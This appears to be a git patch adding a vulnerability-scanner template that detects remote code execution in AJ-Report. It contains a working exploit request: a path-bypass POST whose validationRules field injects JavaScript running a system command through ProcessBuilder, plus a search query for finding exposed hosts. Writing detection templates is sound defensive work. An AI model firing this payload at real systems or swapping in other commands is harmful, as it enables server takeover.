From 623c041231ee7c97d48f9e64fe81781e22568903 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 23 May 2024 18:31:42 +0530
Subject: [PATCH] Create aj-report-rce.yaml

---
 http/vulnerabilities/other/aj-report-rce.yaml | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 http/vulnerabilities/other/aj-report-rce.yaml

diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml
new file mode 100644
index 00000000000..00fc980bbb2
--- /dev/null
+++ b/http/vulnerabilities/other/aj-report-rce.yaml
@@ -0,0 +1,42 @@
+id: aj-report-rce
+
+info:
+  name: AJ-Report Open Source Data Screen - Remote Code Execution
+  author: pussycat0x
+  severity: high
+  description: |
+    AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.
+  reference:
+    - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    fofa-query: title="AJ-Report"
+  tags: aj-report,rce
+
+http:
+  - raw:
+      - |
+        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+        Content-Type: application/json;charset=UTF-8
+
+        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}        
+
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "code"
+          - "data"
+        condition: and
+
+      - type: regex
+        part: body
+        regex:
+          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"  
+
+      - type: status
+        status:
+          - 200